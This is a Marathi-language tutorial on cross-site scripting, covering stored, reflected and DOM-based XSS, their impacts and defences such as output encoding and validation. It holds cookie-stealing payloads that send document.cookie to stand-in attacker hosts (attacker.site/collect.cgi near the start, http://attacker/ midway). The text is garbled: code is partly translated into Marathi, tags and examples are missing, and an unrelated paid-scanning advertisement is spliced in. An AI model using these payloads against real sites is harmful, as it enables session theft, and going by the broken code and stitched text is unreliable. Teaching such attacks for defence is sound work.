xss हल्ला म्हणजे काय. XSS भेद्यता काय आहे

स्वागत आहे! हाय अलर्ट (document.cookie)

आमच्या सिस्टममध्ये आपले स्वागत आहे...

var बळी_विंडो=ओपन(","फूबार");सूचना("प्रवेश करू शकता:

"+victim_window.location.search)

विंडो उघडा

("http://www.attacker.site/collect.cgi?cookie="+document.cookie)">

आतापर्यंत, आम्ही पाहिले आहे की स्क्रिप्ट प्रतिसाद देत असलेल्या GET विनंती पॅरामीटरमध्ये XSS हल्ला होऊ शकतो. परंतु POST विनंती वापरून किंवा HTTP विनंती पथ घटक वापरून हल्ला करणे आणि काही HTTP शीर्षलेख (उदाहरणार्थ, संदर्भ) वापरणे देखील शक्य आहे.

विशेषतः, जेव्हा एरर पेज अवैध मार्ग दाखवते तेव्हा पथ घटक उपयुक्त ठरतो. या प्रकरणात, मार्गामध्ये दुर्भावनापूर्ण स्क्रिप्टचा समावेश केल्याने अनेकदा त्याची अंमलबजावणी होते. अनेक वेब सर्व्हर या हल्ल्यासाठी असुरक्षित आहेत.

हे समजून घेणे महत्त्वाचे आहे की या हल्ल्यामुळे वेबसाइटवर थेट परिणाम होत नसला तरी (ती सामान्यपणे कार्य करत राहते, त्यावर कोणताही दुर्भावनापूर्ण कोड कार्यान्वित केला जात नाही, DoS हल्ला होत नाही आणि साइटवरील डेटा थेट वाचला किंवा छेडछाड केला जात नाही. सह), साइटने ग्राहकांना किंवा अभ्यागतांना ऑफर केलेल्या सुरक्षा व्यवस्थेचा तो अजूनही उल्लंघन आहे. हे कमकुवत सुरक्षा लेबलांसह अनुप्रयोग तैनात करण्यासाठी वापरल्या जाणार्‍या साइटसारखे आहे. यामुळे, आक्रमणकर्ता क्लायंटच्या सुरक्षा लेबलचा अंदाज लावू शकतो आणि तो (किंवा तिचा) असल्याचे भासवू शकतो.

ऍप्लिकेशनमधील कमकुवत बिंदू स्क्रिप्ट आहे, जे त्याचे मूल्य विचारात न घेता त्याचे पॅरामीटर परत करते. चांगल्या स्क्रिप्टने हे सुनिश्चित केले पाहिजे की पॅरामीटर योग्य फॉरमॅटमध्ये आहे, त्यात वैध वर्ण आहेत आणि असेच. वैध पॅरामीटरमध्ये HTML टॅग किंवा JavaScript कोड असण्याचे सहसा कोणतेही कारण नसते. प्रतिसादात एम्बेड करण्यापूर्वी किंवा अॅप्लिकेशनमध्ये वापरण्यापूर्वी ते पॅरामीटरमधून काढले जाणे आवश्यक आहे. हे सुरक्षितता सुनिश्चित करेल.

XSS हल्ल्यांपासून तुमची साइट सुरक्षित करण्याचे तीन मार्ग आहेत.

• यासाठी अॅप्लिकेशन प्रोग्रामरला सुरक्षा तंत्रज्ञानाचे चांगले ज्ञान असणे आवश्यक आहे.
• यासाठी प्रोग्रामरने सर्व संभाव्य इनपुट स्रोत (विनंती पॅरामीटर्स, POST विनंती बॉडी पॅरामीटर्स, HTTP शीर्षलेख) कव्हर करणे आवश्यक आहे.
• हे तृतीय पक्ष स्क्रिप्ट किंवा सर्व्हरमधील भेद्यतेपासून संरक्षण करू शकत नाही. उदाहरणार्थ, ते वेब सर्व्हरवरील त्रुटी पृष्ठांमधील समस्यांपासून संरक्षण करणार नाही (जे स्त्रोत मार्ग प्रदर्शित करतात).

साइट संरक्षणाचा तार्किक निष्कर्ष म्हणजे XSS हल्ल्यांविरूद्ध त्याची सुरक्षा तपासणे. XSS पासून साइटचे संरक्षण करण्याप्रमाणे, सुरक्षा तपासणी व्यक्तिचलितपणे (कठीण मार्गाने) किंवा स्वयंचलित वेब ऍप्लिकेशन असुरक्षा मूल्यमापन साधन वापरून केली जाऊ शकते. असे साधन पडताळणीचे ओझे तुमच्या खांद्यावरून काढून टाकेल. हा प्रोग्राम साइटवर फिरतो आणि त्याला सापडलेल्या प्रत्येक स्क्रिप्टसाठी माहित असलेली प्रत्येक विविधता चालवतो. हे सर्व पॅरामीटर्स, हेडर आणि पथ वापरून पाहते. दोन्ही पद्धतींमध्ये, ऍप्लिकेशनमधील प्रत्येक इनपुट (सर्व स्क्रिप्टचे पॅरामीटर्स, HTTP हेडर, पथ) शक्य तितक्या पर्यायांसह तपासले जातात. आणि जर प्रतिसाद पानावर जावास्क्रिप्ट कोड अशा संदर्भात असेल जिथे ब्राउझर तो कार्यान्वित करू शकतो, तर XSS असुरक्षा संदेश दिसेल. उदाहरणार्थ, खालील मजकूर पाठवताना:

प्रत्येक स्क्रिप्टच्या प्रत्येक पॅरामीटरसाठी (XSS भेद्यतेचा सर्वात सोपा प्रकार शोधण्यासाठी JavaScript क्षमता असलेल्या ब्राउझरद्वारे), मजकूराचा JavaScript कोड म्हणून अर्थ लावल्यास ब्राउझर JavaScript अलर्ट विंडो पॉप अप करेल. अर्थात, अनेक पर्याय आहेत. म्हणून, केवळ या पर्यायाची चाचणी करणे पुरेसे नाही. आणि, तुम्ही आधीच शिकल्याप्रमाणे, तुम्ही JavaScript कोड विविध विनंती फील्डमध्ये एम्बेड करू शकता: पॅरामीटर्स, HTTP शीर्षलेख आणि पथ. तथापि, काही प्रकरणांमध्ये (विशेषत: HTTP संदर्भ शीर्षलेखासह) ब्राउझर-आधारित हल्ला करणे गैरसोयीचे आहे.

क्रॉस-साइट स्क्रिप्टिंग हे सर्वात सामान्य ऍप्लिकेशन लेयर हल्ल्यांपैकी एक आहे जे हॅकर्स वेब ऍप्लिकेशन्समध्ये घुसण्यासाठी वापरतात. हे देखील सर्वात धोकादायक आहे. विशिष्ट वेबसाईटच्या ग्राहकांच्या गोपनीयतेवर हा हल्ला आहे. जेव्हा ग्राहकांचा डेटा चोरीला जातो आणि नंतर काही कारणासाठी वापरला जातो तेव्हा यामुळे सुरक्षा प्रणालीचा संपूर्ण नाश होऊ शकतो. दुर्दैवाने, या लेखात स्पष्ट केल्याप्रमाणे, हे सहसा क्लायंट किंवा संस्थेवर हल्ला केल्याच्या माहितीशिवाय केले जाते.

वेबसाइटना या दुर्भावनापूर्ण क्रियाकलापांपासून असुरक्षित होण्यापासून रोखण्यासाठी, संस्थेने ऑनलाइन आणि ऑफलाइन दोन्ही संरक्षणासाठी धोरण राबवणे महत्त्वाचे आहे. यामध्ये स्वयंचलित असुरक्षा तपासक समाविष्ट आहे जो साइटवर सर्व ज्ञात वेब साइट आणि विशिष्ट अनुप्रयोग भेद्यता (जसे की क्रॉस-साइट स्क्रिप्टिंग) तपासू शकतो. संपूर्ण ऑनलाइन संरक्षणासाठी, एक फायरवॉल स्थापित करणे देखील आवश्यक आहे जे वेब सर्व्हरवर किंवा त्यामागे राहणाऱ्या कोड आणि डेटाच्या कोणत्याही प्रकारची हाताळणी शोधू आणि अवरोधित करू शकते.

टॅग

हा टॅग बाह्य साइटवरील स्क्रिप्टमध्ये समाविष्ट करण्यासाठी वापरला जाऊ शकतो.

तुमची साइट क्रॉस-साइट स्क्रिप्टिंगसाठी असुरक्षित आहे का?

XSS भेद्यता ही इंटरनेटवरील सर्वात सामान्य वेब ऍप्लिकेशन भेद्यता आहे. सुदैवाने, फक्त माझ्याशी संपर्क साधून तुमची वेबसाइट किंवा वेब ऍप्लिकेशन XSS आणि इतर भेद्यतेसाठी असुरक्षित आहे की नाही हे तपासणे सोपे आहे. थोड्या शुल्कासाठी, मी विशेष प्रोग्रामच्या मदतीने तुमचे संसाधन स्कॅन करेन, संभाव्य भेद्यता शोधून काढेन आणि त्यांचे निराकरण कसे करावे हे सुचवेन.

आणि क्रॉस-साइट स्क्रिप्टिंगवरील सर्वसमावेशक पाठ्यपुस्तक आहे.

क्रॉस साइट स्क्रिप्टिंग ( इंग्रजी क्रॉस साइट स्क्रिप्टिंग) हा एक कोड इंजेक्शन हल्ला आहे जो आक्रमणकर्त्याला दुसर्‍या वापरकर्त्याच्या ब्राउझरमध्ये दुर्भावनापूर्ण JavaScript कार्यान्वित करण्यास अनुमती देतो.

हल्लेखोर त्याच्या बळीवर थेट हल्ला करत नाही. त्याऐवजी, पीडित व्यक्ती भेट देत असलेल्या वेबसाइटमधील असुरक्षिततेचा फायदा घेते आणि दुर्भावनापूर्ण JavaScript कोड इंजेक्ट करते. पीडिताच्या ब्राउझरमध्ये, दुर्भावनापूर्ण JavaScript वेबसाइटचा कायदेशीर भाग म्हणून दिसते आणि वेबसाइट स्वतः आक्रमणकर्त्याचा थेट साथीदार म्हणून काम करते.

पीडिताच्या ब्राउझरमध्ये दुर्भावनापूर्ण JavaScript चालवण्याचा आक्रमणकर्त्यासाठी एकमेव मार्ग म्हणजे पीडित व्यक्तीने वेबसाइटवरून लोड केलेल्या पृष्ठांपैकी एकामध्ये ते इंजेक्ट करणे. जर वेबसाइट वापरकर्त्यांना त्यांच्या पृष्ठांवर डेटा प्रविष्ट करण्याची परवानगी देत ​​असेल तर हे शक्य आहे आणि आक्रमणकर्ता पीडिताच्या ब्राउझरमध्ये कोडचा भाग म्हणून ओळखली जाणारी स्ट्रिंग घालू शकतो.

खालील उदाहरण एक साधी सर्व्हर स्क्रिप्ट दर्शवते जी साइटवर नवीनतम टिप्पणी प्रदर्शित करण्यासाठी वापरली जाते:

प्रिंट ""
"अंतिम टिप्पणी:" मुद्रित करा
database.latestComment प्रिंट करा
प्रिंट ""

स्क्रिप्ट असे गृहीत धरते की टिप्पणीमध्ये फक्त मजकूर असतो. तथापि, थेट वापरकर्ता इनपुट सक्षम केल्यामुळे, आक्रमणकर्ता ही टिप्पणी देऊ शकतो: "..." . पृष्ठास भेट देणाऱ्या कोणत्याही वापरकर्त्याला आता खालील प्रतिसाद प्राप्त होईल:

शेवटची टिप्पणी:
...

जेव्हा वापरकर्त्याचा ब्राउझर पृष्ठ लोड करतो, तेव्हा ते टॅगमध्ये असलेल्या JavaScriptसह सर्वकाही कार्यान्वित करेल. हल्लेखोराने हा हल्ला यशस्वीपणे पार पाडला.

बळीच्या ब्राउझरमध्ये JavaScript कार्यान्वित करण्याची क्षमता विशेषतः दुर्भावनापूर्ण वाटू शकत नाही. JavaScript अतिशय प्रतिबंधित वातावरणात चालते ज्यात वापरकर्ता आणि ऑपरेटिंग सिस्टम फायलींमध्ये अत्यंत मर्यादित प्रवेश आहे. खरं तर, तुम्ही आत्ता तुमच्या ब्राउझरमध्ये JavaScript कन्सोल उघडू शकता आणि तुम्हाला हवी असलेली कोणतीही JavaScript कार्यान्वित करू शकता आणि तुम्ही तुमच्या कॉम्प्युटरला कोणतीही हानी पोहोचवू शकाल याची शक्यता कमी आहे.

तथापि, JavaScript कोडची दुर्भावनापूर्ण असण्याची क्षमता स्पष्ट होते जेव्हा तुम्ही खालील तथ्यांचा विचार करता:

• JavaScript ला वापरकर्त्याच्या काही संवेदनशील माहितीमध्ये प्रवेश आहे, जसे की कुकीज.
• JavaScript XMLHttpRequest आणि इतर यंत्रणा वापरून अनियंत्रित दिशेने अनियंत्रित सामग्रीसह HTTP विनंत्या पाठवू शकते.
• JavaScript DOM मॅनिपुलेशन पद्धती वापरून वर्तमान पृष्ठाच्या HTML कोडमध्ये अनियंत्रित बदल करू शकते.

एकत्रित केल्यावर, या तथ्यांमुळे खूप गंभीर सुरक्षा उल्लंघन होऊ शकते, तपशील पुढे जातील.

याव्यतिरिक्त, दुसर्‍या वापरकर्त्याच्या ब्राउझरमध्ये अनियंत्रित JavaScript कार्यान्वित करण्याची क्षमता आक्रमणकर्त्याला खालील प्रकारचे हल्ले करण्यास अनुमती देते:

कुकी चोरी

आक्रमणकर्ता document.cookie वापरून पीडिताच्या वेबसाइट-संबंधित कुकीजमध्ये प्रवेश करू शकतो, त्यांना त्यांच्या स्वतःच्या सर्व्हरवर पाठवू शकतो आणि सत्र आयडी सारखी संवेदनशील माहिती काढण्यासाठी वापरू शकतो.

कीलॉगर

आक्रमणकर्ता addEventListener वापरून कीबोर्ड इव्हेंट श्रोता नोंदणी करू शकतो आणि नंतर वापरकर्त्याचे सर्व कीस्ट्रोक त्यांच्या सर्व्हरवर पाठवू शकतो, संभाव्यत: पासवर्ड आणि क्रेडिट कार्ड नंबर यासारखी संवेदनशील माहिती लॉग करू शकतो.

फिशिंग

आक्रमणकर्ता DOM मॅनिपुलेशन वापरून पृष्ठामध्ये बनावट लॉगिन फॉर्म घालू शकतो, फॉर्मची क्रिया गुणधर्म त्यांच्या स्वतःच्या सर्व्हरवर सेट करू शकतो आणि नंतर वापरकर्त्याला संवेदनशील माहिती मिळविण्यासाठी फसवू शकतो.

जरी हे हल्ले लक्षणीयरीत्या भिन्न असले तरी, त्या सर्वांमध्ये एक महत्त्वाची समानता आहे: कारण आक्रमणकर्ता वेबसाइटद्वारे दिलेल्या पृष्ठामध्ये कोड इंजेक्ट करतो, त्या वेबसाइटच्या संदर्भात दुर्भावनापूर्ण JavaScript कार्यान्वित केले जाते. याचा अर्थ असा की त्या साइटवरील इतर कोणत्याही स्क्रिप्टप्रमाणे ती हाताळली जाते: त्यास त्या वेबसाइटसाठी पीडिताच्या डेटामध्ये प्रवेश आहे (जसे की कुकी रेकॉर्ड) आणि URL स्ट्रिंगमध्ये प्रदर्शित होस्टनाव वेबसाइटच्या प्रमाणेच असेल. सर्व उद्देशांसाठी, स्क्रिप्ट वेबसाइटचा कायदेशीर भाग मानली जाते, जी वेबसाइट स्वतः करू शकते असे काहीही करू देते.

ही वस्तुस्थिती मुख्य समस्या हायलाइट करते:

जर एखादा आक्रमणकर्ता तुमची वेबसाइट इतर वापरकर्त्यांच्या ब्राउझरमध्ये अनियंत्रित JavaScript कोड कार्यान्वित करण्यासाठी वापरू शकतो, तर तुमच्या वेबसाइटची आणि तिच्या वापरकर्त्यांच्या सुरक्षिततेशी तडजोड केली जाते.

हा मुद्दा अधोरेखित करण्यासाठी, या ट्युटोरियलमधील काही दुर्भावनापूर्ण स्क्रिप्ट उदाहरणे ... वापरून तपशीलवार सोडली जातील. हे सूचित करते की आक्रमणकर्त्याद्वारे केवळ स्क्रिप्ट इंजेक्ट केली जाणे ही एक समस्या आहे, कोणताही विशिष्ट स्क्रिप्ट कोड प्रत्यक्षात अंमलात आणला जात असला तरीही.

XSS हल्ला कसा कार्य करतो याचे तपशीलवार वर्णन करण्यापूर्वी, आम्हाला XSS हल्ल्यात सहभागी असलेल्या कलाकारांची व्याख्या करणे आवश्यक आहे. सर्वसाधारणपणे, XSS हल्ल्यात तीन कलाकार असतात: वेबसाइट, पीडित आणि हल्लेखोर.

• वेबसाइट त्यांना विनंती करणार्‍या वापरकर्त्यांसाठी HTML पृष्ठे देते. आमच्या उदाहरणांमध्ये, ते http://website/ वर स्थित आहे.
  • वेबसाइट डेटाबेस हा एक डेटाबेस आहे जो वेबसाइटच्या पृष्ठांवर वापरकर्त्यांनी प्रविष्ट केलेला काही डेटा संग्रहित करतो.
• पीडित हा वेबसाइटचा नियमित वापरकर्ता असतो जो त्यांच्या ब्राउझरचा वापर करून त्यावरील पृष्ठांची विनंती करतो.
• हल्लेखोर हा हल्लेखोर असतो जो साइटवरील XSS असुरक्षिततेचा गैरफायदा घेऊन पीडितेवर हल्ला करण्याचा विचार करतो.
  • घुसखोर सर्व्हर हा पीडिताची गोपनीय माहिती चोरण्याच्या एकमेव उद्देशाने आक्रमणकर्त्याद्वारे नियंत्रित केलेला वेब सर्व्हर आहे. आमच्या उदाहरणांमध्ये, ते http://attacker/ येथे स्थित आहे.

window.location="http://attacker/?cookie="+document.cookie

ही स्क्रिप्ट दुसर्‍या URL वर HTTP विनंती तयार करेल जी वापरकर्त्याच्या ब्राउझरला आक्रमणकर्त्याच्या सर्व्हरवर पुनर्निर्देशित करेल. URL मध्ये पीडिताची कुकी विनंती पॅरामीटर म्हणून समाविष्ट असते, जेव्हा आक्रमणकर्त्याच्या सर्व्हरवर HTTP विनंती येते तेव्हा आक्रमणकर्ता विनंतीमधून या कुकीज काढू शकतो. एकदा हल्लेखोराने कुकीज मिळविल्यानंतर, ते पीडिताची तोतयागिरी करण्यासाठी आणि त्यानंतरचा हल्ला करण्यासाठी त्यांचा वापर करू शकतात.

आतापासून, वर दर्शविलेल्या HTML ला दुर्भावनायुक्त स्ट्रिंग किंवा दुर्भावनायुक्त स्क्रिप्ट म्हणून संबोधले जाईल. हे समजून घेणे महत्त्वाचे आहे की स्ट्रिंग स्वतःच दुर्भावनापूर्ण आहे जर ती शेवटी पीडिताच्या ब्राउझरमध्ये HTML म्हणून प्रस्तुत केली गेली असेल, जे वेबसाइटमध्ये XSS भेद्यता असल्यासच होऊ शकते.

खालील आकृती हल्लेखोराने केलेल्या हल्ल्याचे उदाहरण दाखवते:

XSS हल्ल्याचे ध्येय नेहमी पीडिताच्या ब्राउझरमध्ये दुर्भावनापूर्ण JavaScript स्क्रिप्ट कार्यान्वित करणे हे असते. हे ध्येय साध्य करण्यासाठी अनेक मूलभूतपणे भिन्न मार्ग आहेत. XSS हल्ले सहसा तीन प्रकारांमध्ये वर्गीकृत केले जातात:

• संचयित (सतत) XSS , जिथे दुर्भावनायुक्त स्ट्रिंग वेबसाइटच्या डेटाबेसमधून उद्भवते.
• परावर्तित (नॉन-पर्सिस्टंट) XSS, जिथे दुर्भावनायुक्त स्ट्रिंग पीडिताच्या विनंतीवरून व्युत्पन्न होते.
• XSS DOM, जिथे भेद्यता क्लायंट-साइड कोडमध्ये आढळते, सर्व्हर-साइड कोडमध्ये नाही.

मागील उदाहरण संचयित XSS हल्ला दाखवते. आम्ही आता XSS हल्ल्यांच्या इतर दोन प्रकारांचे वर्णन करू: परावर्तित XSS आणि DOM XSS हल्ले.

परावर्तित XSS हल्ल्यात, दुर्भावनायुक्त स्ट्रिंग पीडिताच्या वेबसाइटला केलेल्या विनंतीचा भाग आहे. साइट वापरकर्त्याला परत पाठवलेल्या प्रतिसादात ही दुर्भावनापूर्ण स्ट्रिंग स्वीकारते आणि समाविष्ट करते. खालील आकृती ही परिस्थिती स्पष्ट करते:

परावर्तित XSS हल्ला यशस्वीरित्या कसा करायचा?

परावर्तित XSS हल्ला निरुपद्रवी वाटू शकतो कारण यासाठी पीडिताला त्यांच्या वतीने दुर्भावनायुक्त स्ट्रिंग असलेली विनंती सबमिट करणे आवश्यक आहे. कोणीही स्वेच्छेने स्वतःवर हल्ला करणार नसल्यामुळे, प्रत्यक्षात हल्ला करण्याचा कोणताही मार्ग दिसत नाही.

असे दिसून आले की, पीडित व्यक्तीने स्वतःवर परावर्तित XSS हल्ला सुरू करण्याचे किमान दोन सामान्य मार्ग आहेत:

• वापरकर्ता विशिष्ट व्यक्ती असल्यास, आक्रमणकर्ता पीडित व्यक्तीला दुर्भावनापूर्ण URL पाठवू शकतो (उदाहरणार्थ, ईमेल किंवा मेसेंजरद्वारे) आणि वेबसाइटला भेट देण्यासाठी लिंक उघडण्यासाठी फसवू शकतो.
• लक्ष्य वापरकर्त्यांचा एक मोठा गट असल्यास, आक्रमणकर्ता दुर्भावनापूर्ण URL ची लिंक पोस्ट करू शकतो (उदाहरणार्थ, त्यांच्या स्वतःच्या वेबसाइटवर किंवा सोशल नेटवर्कवर) आणि अभ्यागतांनी लिंकवर क्लिक करण्याची प्रतीक्षा केली आहे.

या दोन्ही पद्धती सारख्याच आहेत आणि URL शॉर्टनिंग सेवांसह दोन्ही अधिक यशस्वी होऊ शकतात ज्या वापरकर्त्यांकडून दुर्भावनापूर्ण स्ट्रिंग ओळखण्यास सक्षम असतील.

DOM मधील XSS हा संग्रहित आणि परावर्तित XSS हल्ल्याचा एक प्रकार आहे. या XSS हल्ल्यामध्ये, वेबसाइटचे वास्तविक JavaScript कार्यान्वित होईपर्यंत पीडिताच्या ब्राउझरद्वारे दुर्भावनापूर्ण स्ट्रिंगवर प्रक्रिया केली जात नाही. खालील आकृती प्रतिबिंबित XSS हल्ल्यासाठी ही परिस्थिती स्पष्ट करते:

संग्रहित आणि परावर्तित XSS हल्ल्यांच्या मागील उदाहरणांमध्ये, सर्व्हर पृष्ठामध्ये दुर्भावनापूर्ण स्क्रिप्ट घालतो, जी नंतर पीडिताला प्रतिसाद म्हणून पाठविली जाते. जेव्हा पीडिताच्या ब्राउझरला प्रतिसाद मिळतो, तेव्हा ते असे गृहीत धरते की दुर्भावनायुक्त स्क्रिप्ट पृष्ठाच्या कायदेशीर सामग्रीचा भाग आहे आणि इतर कोणत्याही स्क्रिप्टप्रमाणेच पृष्ठ लोड दरम्यान ते स्वयंचलितपणे कार्यान्वित करते.

DOM XSS हल्ला उदाहरणामध्ये, दुर्भावनायुक्त स्क्रिप्ट पृष्ठाचा भाग म्हणून घातली जात नाही; पृष्ठ लोड दरम्यान स्वयंचलितपणे कार्यान्वित होणारी एकमेव स्क्रिप्ट पृष्ठाचा कायदेशीर भाग आहे. समस्या अशी आहे की ही कायदेशीर स्क्रिप्ट पृष्ठावर HTML जोडण्यासाठी थेट वापरकर्ता इनपुट वापरते. इनरएचटीएमएल वापरून दुर्भावनायुक्त स्ट्रिंग पृष्ठामध्ये घातल्यामुळे, ती HTML म्हणून पार्स केली जाते, ज्यामुळे दुर्भावनायुक्त स्क्रिप्ट कार्यान्वित होते.

हा फरक लहान आहे, परंतु खूप महत्वाचा आहे:

• पारंपारिक XSS मध्ये, सर्व्हरद्वारे पाठवलेल्या HTML चा भाग म्हणून, पृष्ठ लोड झाल्यावर दुर्भावनापूर्ण JavaScript कार्यान्वित केले जाते.
• DOM मधील XSS च्या बाबतीत, पृष्ठ लोड केल्यानंतर दुर्भावनापूर्ण JavaScript कार्यान्वित केले जाते, परिणामी ते पृष्ठ कायदेशीर JavaScript वापरकर्ता इनपुट (दुर्भावनायुक्त स्ट्रिंग असलेले) असुरक्षित मार्गाने प्रवेश करते.

मागील उदाहरणात, JavaScript ची गरज नाही; सर्व्हर सर्व HTML स्वतः तयार करू शकतो. सर्व्हर-साइड कोडमध्ये भेद्यता नसल्यास, वेबसाइटवर XSS भेद्यतेचा परिणाम होणार नाही.

तथापि, वेब ऍप्लिकेशन्स जसजसे अधिक प्रगत होत जातात, तसतसे अधिकाधिक HTML पृष्ठे सर्व्हरच्या बाजूने न जाता क्लायंटच्या बाजूने JavaScript सह व्युत्पन्न होतात. कोणत्याही वेळी, संपूर्ण पृष्ठ रीफ्रेश न करता सामग्री बदलली पाहिजे, हे JavaScript वापरून शक्य आहे. विशेषतः, जेव्हा AJAX विनंतीनंतर पृष्ठ रीफ्रेश केले जाते तेव्हा असे होते.

याचा अर्थ XSS भेद्यता तुमच्या साइट कोडच्या सर्व्हर बाजूलाच नाही तर तुमच्या साइटच्या JavaScript कोडच्या क्लायंट बाजूला देखील असू शकते. म्हणून, पूर्णपणे सुरक्षित सर्व्हर-साइड कोडसह, पृष्ठ लोड झाल्यानंतर DOM अद्यतनित करताना क्लायंट कोड अद्याप सुरक्षितपणे वापरकर्ता इनपुट समाविष्ट करू शकत नाही. असे झाल्यास, क्लायंट-साइड कोड सर्व्हर-साइड कोडच्या कोणत्याही दोषाशिवाय XSS आक्रमणास अनुमती देईल.

DOM मध्‍ये XSS अटॅकची एक विशेष घटना आहे ज्यात दुर्भावनापूर्ण स्ट्रिंग कधीही वेबसाइट सर्व्हरवर पाठविली जात नाही: जेव्हा दुर्भावनापूर्ण स्ट्रिंग URL अभिज्ञापकाच्या एका तुकड्यात असते (# चिन्हानंतर काहीही) तेव्हा असे होते. ब्राउझर URL चा हा भाग सर्व्हरला पाठवत नाहीत, त्यामुळे वेबसाइट सर्व्हर-साइड कोडसह त्यात प्रवेश करू शकत नाही. तथापि, क्लायंट-साइड कोडमध्ये प्रवेश आहे, आणि अशा प्रकारे असुरक्षित प्रक्रियेद्वारे XSS हल्ला शक्य आहे.

हे प्रकरण फक्त फ्रॅगमेंट आयडीपुरते मर्यादित नाही. इतर वापरकर्ता इनपुट आहे जे सर्व्हरवर अदृश्य आहे, जसे की नवीन HTML5 वैशिष्ट्ये जसे की LocalStorage आणि IndexedDB.

आठवा की XSS हा एक कोड इंजेक्शन हल्ला आहे: वापरकर्ता इनपुटचा चुकीने दुर्भावनायुक्त कोड म्हणून अर्थ लावला जातो. या प्रकारचे कोड इंजेक्शन रोखण्यासाठी सुरक्षित इनपुट हाताळणी आवश्यक आहे. वेब डेव्हलपरसाठी, सुरक्षित इनपुट प्रक्रिया करण्यासाठी दोन मूलभूतपणे भिन्न मार्ग आहेत:

• एन्कोडिंग हे एक तंत्र आहे जे वापरकर्ता इनपुट केवळ डेटा म्हणून तयार करण्यास अनुमती देते आणि ब्राउझरला त्यावर कोड म्हणून प्रक्रिया करण्याची परवानगी देत ​​​​नाही.
• प्रमाणीकरण हा वापरकर्ता इनपुट फिल्टर करण्याचा एक मार्ग आहे जेणेकरुन ब्राउझर दुर्भावनायुक्त आदेशांशिवाय कोड म्हणून त्याचा अर्थ लावेल.

जरी या मूलभूतपणे भिन्न XSS प्रतिबंध पद्धती आहेत, ते काही समानता सामायिक करतात जे त्यापैकी कोणतेही वापरताना समजून घेणे महत्वाचे आहे:

संदर्भ सुरक्षित इनपुट हाताळणी पृष्ठावरील वापरकर्ता इनपुट कोठे वापरले जाते यावर अवलंबून भिन्न प्रकारे केले पाहिजे. इनबाउंड/आउटबाउंड सुरक्षित इनपुट प्रक्रिया एकतर तुमच्या साइटला इनपुट (इनबाउंड ट्रॅफिक) प्राप्त झाल्यावर किंवा साइटने पृष्ठ सामग्रीमध्ये (आउटबाउंड) वापरकर्त्याचे इनपुट समाविष्ट करण्यापूर्वी केली जाऊ शकते. क्लायंट/सर्व्हर सुरक्षित इनपुट प्रक्रिया क्लायंटच्या बाजूने किंवा सर्व्हरच्या बाजूने केली जाऊ शकते, प्रत्येक पर्याय वेगवेगळ्या परिस्थितीत आवश्यक आहे.

एन्कोडिंग आणि प्रमाणीकरण कसे कार्य करते हे तपशीलवार सांगण्यापूर्वी, आम्ही या प्रत्येक बिंदूचे वर्णन करू.

वेब पृष्ठावर अनेक संदर्भ आहेत जेथे वापरकर्ता इनपुट लागू केले जाऊ शकते. त्या प्रत्येकासाठी, विशेष नियमांचे पालन करणे आवश्यक आहे जेणेकरुन वापरकर्ता इनपुट त्याच्या संदर्भातून "ब्रेक आउट" होऊ शकत नाही आणि दुर्भावनापूर्ण कोड म्हणून त्याचा अर्थ लावला जाऊ शकतो. खालील सर्वात सामान्य संदर्भ आहेत:

वर्णन केलेल्या सर्व संदर्भांमध्ये, प्रथम एन्कोडिंग किंवा प्रमाणीकरणापूर्वी वापरकर्ता इनपुट घातल्यास XSS भेद्यता येऊ शकते. आक्रमणकर्ता या संदर्भासाठी क्लोजिंग डिलिमिटर टाकून फक्त दुर्भावनापूर्ण कोड इंजेक्ट करू शकतो.

उदाहरणार्थ, एखाद्या वेळी एखाद्या वेबसाइटने थेट HTML विशेषतामध्ये वापरकर्ता इनपुट समाविष्ट केल्यास, आक्रमणकर्ता खाली दर्शविल्याप्रमाणे त्यांचे इनपुट कोटसह प्रारंभ करून दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट करू शकतो:

वापरकर्ता इनपुटमधील सर्व कोट्स काढून टाकून हे प्रतिबंधित केले जाऊ शकते आणि सर्वकाही ठीक होईल, परंतु केवळ या संदर्भात. जर इनपुट वेगळ्या संदर्भात घातला असेल, तर बंद होणारे परिसीमक वेगळे असेल आणि इंजेक्शन शक्य होईल. या कारणास्तव, सुरक्षित इनपुट हाताळणी नेहमी वापरकर्ता इनपुट घातली जाईल अशा संदर्भाशी जुळवून घेणे आवश्यक आहे.

सहजतेने, असे दिसते की XSS आमच्या साइटला प्राप्त होताच सर्व वापरकर्ता इनपुट एन्कोडिंग किंवा प्रमाणित करून प्रतिबंधित केले जाऊ शकते. अशाप्रकारे, कोणत्याही दुर्भावनायुक्त स्ट्रिंग्स जेव्हाही पृष्ठामध्ये समाविष्ट केल्या जातात तेव्हा त्या आधीच तटस्थ केल्या जातील आणि HTML जनरेशन स्क्रिप्ट्सना वापरकर्ता इनपुट सुरक्षितपणे हाताळण्याची काळजी करण्याची गरज नाही.

समस्या अशी आहे की, आधी वर्णन केल्याप्रमाणे, वापरकर्ता इनपुट पृष्ठावरील एकाधिक संदर्भांमध्ये समाविष्ट केले जाऊ शकते. आणि वापरकर्ता इनपुट संदर्भामध्ये केव्हा येतो हे निर्धारित करण्याचा कोणताही सोपा मार्ग नाही - तो अखेरीस कसा घातला जाईल आणि समान वापरकर्ता इनपुट अनेकदा वेगवेगळ्या संदर्भांमध्ये समाविष्ट करणे आवश्यक आहे. XSS रोखण्यासाठी इनकमिंग इनपुट हाताळण्यावर अवलंबून राहून, आम्ही एक अतिशय ठिसूळ उपाय तयार करत आहोत ज्यामध्ये त्रुटी असतील. (नापसलेले PHP "जादूचे अवतरण" हे अशा समाधानाचे उदाहरण आहे.)

त्याऐवजी, आउटबाउंड इनपुट हाताळणी ही XSS विरूद्ध तुमची मुख्य संरक्षणाची ओळ असली पाहिजे कारण ते वापरकर्ता इनपुट कोणते समाविष्ट केले जाईल याचा विशिष्ट संदर्भ विचारात घेऊ शकते. काही प्रमाणात, संरक्षणाचा दुय्यम स्तर जोडण्यासाठी इनबाउंड प्रमाणीकरण वापरले जाऊ शकते, परंतु त्या नंतर अधिक.

बर्‍याच आधुनिक वेब ऍप्लिकेशन्समध्ये, वापरकर्ता इनपुटवर सर्व्हरच्या बाजूने आणि क्लायंटच्या बाजूने प्रक्रिया केली जाते. सर्व प्रकारच्या XSS पासून संरक्षण करण्यासाठी, सर्व्हर-साइड कोड आणि क्लायंट-साइड कोड दोन्हीमध्ये सुरक्षित इनपुट हाताळणी करणे आवश्यक आहे.

• पारंपारिक XSS पासून संरक्षण करण्यासाठी, सर्व्हर-साइड कोडमध्ये सुरक्षित इनपुट हाताळणी करणे आवश्यक आहे. हे सर्व्हरद्वारे समर्थित काही भाषा वापरून केले जाते.
